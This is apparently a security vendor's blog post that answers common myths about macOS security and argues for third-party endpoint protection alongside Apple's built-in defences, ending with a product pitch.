Hi, I’m a Mac guy! Over the past year, I've received many questions from people—sales people, technical people, directors and executives, end users like my family, and beyond—that all revolve around "why should we protect macOS?" Now, this question is usually in the subtext.
There are a handful of macOS security myths out there, which brings a lot of questions from users or the IT community. So, let's address some of the most common questions I've received, and then wrap up by discussing the big one: "Why should I protect my Mac?"
More vulnerable might not be the most accurate representation. Windows devices are currently targeted more, which could make them seem more vulnerable. macOS is still vulnerable to attacks, but as the devices are still under-represented in the market, it makes sense that there would be a perception that macOS is less vulnerable.
That being said, macOS has put many different security mechanisms into its operating system in order to safeguard the end user. Whether it's transparency into what applications are installing persistence, its Transparency, Consent, and Control (TCC) functionality, or its built-in malware protection, Apple has taken many steps to try to protect its end users.
I think there are a handful of reasons for this misconception. One possibly being that macOS security isn't as, pardon the expression, "sexy" as it is on Windows. Although threat actors have attempted to target macOS, it has yet to execute thus far and has seen a limited number of very sophisticated attacks.
On top of this, Windows is still the dominating force in the enterprise business space. Even with macOS growing in popularity, it still pales in comparison. So it makes sense that threat actors would be more likely to target Windows devices with their malware, as opposed to writing a macOS version of it. Although we've seen some cross-platform malware before, typically in the form of a script, you're unlikely to see the same volume of malware on macOS as you would on Windows.
The short answer: yes. As mentioned above, a huge sect of macOS malware is more adware-y than sophisticated attacks. That isn't to say that these more targeted, specific, highly sophisticated attacks don't exist. We've seen with the XCSSET malware that threat actors can actually target programs in the macOS ecosystem, as well as (ab)use the TCC database. We've witnessed malware exploiting 0-days in the operating system to persist, as well as leveraging shells like zsh along with the Shlayer malware.
The sad truth is that Apple just stuck to their guns and never really addressed this folly. This has made many users unaware that the device they use can get viruses. This can also lead to users getting more malware, due to the fact that they are more likely to blindly trust popups on their device because they believe their device is impervious to malware.
Think of it this way: your home is secure by locking your doors. Maybe you have a deadbolt that you swing shut at night. That's Apple and its security. Yes, it's a first line of defense. And for some users, that's enough. But for me, at my house, I also have additional layers—like security cameras and a doorbell camera. I leverage these third-party tools to get more insight into who is approaching my house before they even cross the threshold of my porch.
That's what a third-party security tool does—offers more insight, tighter security, and can alert you earlier to allow you to take swift action if necessary.
To quote a previous blog post of my own where I spoke about Apple's XProtect/XProtect Remediator:
The lack of consumable visibility into what is happening with XProtect and XPR makes it difficult to triage issues at scale. To add to this, Apple has millions of endpoints and any changes to these rules get pushed to all of those machines. That being said, they have zero wiggle room for false positives, which although it is what every EDR company aims to reduce, the truth is that casting a slightly larger net in order to capture malicious behavior, and risking the occasional false positive in lieu of this (to me) is a great tradeoff. Lastly, although YARA is helpful for capturing more samples of malware families, it doesn’t necessarily capture malicious behavior. The malware has to be from specific families in order to be prevented.
To sum it up, Apple has to be incredibly careful with what they push to their endpoints. As good as Apple can protect your device, there are still many holes, which is why a third-party solution is ideal. If this is something you’re considering for your macOS machines, consider a trial with Huntress.
I feel like every question here builds up to this one: Why?
Although macOS is a smaller percentage of devices in the SMB market and in the large markets, it's still quite the viable target. If you think about it, if users are wondering why they should protect their Mac and considering not using an AV solution, then threat actors will have an easy time infecting devices.
Don’t be stuck with just a deadbolt to protect your Mac. Invest in a third-party security tool to lock down the whole house.